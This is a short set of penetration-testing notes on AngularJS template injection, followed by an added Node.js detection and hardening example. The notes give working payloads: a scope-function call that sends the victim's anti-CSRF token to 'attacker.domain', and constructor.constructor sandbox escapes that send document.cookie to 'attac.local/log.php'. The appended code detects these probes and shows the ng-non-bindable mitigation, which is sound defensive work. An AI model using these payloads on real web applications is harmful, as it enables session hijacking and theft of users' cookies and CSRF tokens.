Template Injection & Scope Hacking
- Attack is limited to $scope functions and variables
- Check whether the application uses AngularJS and whether it is vulnerable to template injection:
- Check the page source for the `angular` keyword
- Open dev tools --> Console --> `angular.element($0).scope()`
- This lists the scope: all the elements in the page
- Check the source code of the scope functions to see what each one does
- Developer tools --> Debugger --> select app.js (or whatever the JS file is called) --> search for that function
- Check for any injectable variables (e.g. some empty or dynamic content)
- Call the function
- Send the payload below as input and watch for the outgoing connection, which carries the victim's anti-CSRF token
- `{{Function_Name("https://attacker.domain/reach.php?x=" + anti_csrf)}}`
- Input `{{4-1}}` --> if the output is 3 --> VULNERABLE
- Use this in any input or search parameter.
Going Beyond the Scope - XSS via Template Injection
- Works in AngularJS >= 1.6.0
- https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs
- Find the Angular version in dev tools --> Console:
- `angular.version`
- Create an alert
- `{{constructor.constructor('alert(document.domain)')()}}`
- Get the user cookie
- `{{constructor.constructor('$.get(\'//attac.local/log.php?\'+document.cookie)')()}}`
- If there is any known variable:
- `#var_name=constructor.constructor('$.get(\'//attac.local/log.php?\'+document.cookie)')()`
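Added defender-side example, not part of these notes: a Node.js snippet (no dependencies, all names are my own) that flags the `{{4-1}}` / `constructor.constructor` probes above in request parameters, and shows the same reflected-search page rendered vulnerably and with the `ng-non-bindable` mitigation. HTML-encoding alone does not stop this class of bug, because AngularJS compiles the DOM after the browser has already decoded entities.

```javascript
// Probe patterns from the notes above: an interpolation expression, or the
// constructor.constructor chain used to escape the expression sandbox.
const PROBE = /\{\{[^{}]*\}\}|constructor\s*\.\s*constructor/i;

// Detection: true if a request parameter looks like an AngularJS CSTI probe.
// Decodes once so that %7B%7B4-1%7D%7D style encodings are caught as well.
function detectCsti(value) {
  let decoded = value;
  try { decoded = decodeURIComponent(value); } catch (_) { /* keep raw value */ }
  return PROBE.test(decoded);
}

function htmlEncode(s) {
  return String(s).replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Vulnerable: the query is HTML-encoded, so there is no classic XSS, but it lands
// inside ng-app, so the compiler still evaluates {{...}} in the text node.
function renderVulnerable(query) {
  return `<body ng-app><p>Results for: ${htmlEncode(query)}</p></body>`;
}

// Hardened: ng-non-bindable tells the compiler to skip this subtree, and the brace
// pairs are additionally broken up so the reflected text never forms an
// interpolation marker even if the attribute is lost in a later template refactor.
function renderHardened(query) {
  const safe = htmlEncode(query).replace(/\{\{/g, '{ {').replace(/\}\}/g, '} }');
  return `<body ng-app><p ng-non-bindable>Results for: ${safe}</p></body>`;
}

// Regression check for templates: true if rendered HTML still contains an
// interpolation marker outside any ng-non-bindable element.
function hasLiveInterpolation(html) {
  const stripped = html.replace(
    /<([a-z]+)[^>]*\bng-non-bindable\b[^>]*>[\s\S]*?<\/\1>/gi, '');
  return /\{\{[\s\S]*?\}\}/.test(stripped);
}

// Constructed sample parameter values, as they might appear in an access log.
const SAMPLE_PARAMS = ['angular tutorial', '{{4-1}}', '%7B%7B4-1%7D%7D'];
console.log(SAMPLE_PARAMS.map(p => [p, detectCsti(p)]));
console.log(hasLiveInterpolation(renderVulnerable('{{4-1}}')),
            hasLiveInterpolation(renderHardened('{{4-1}}')));
```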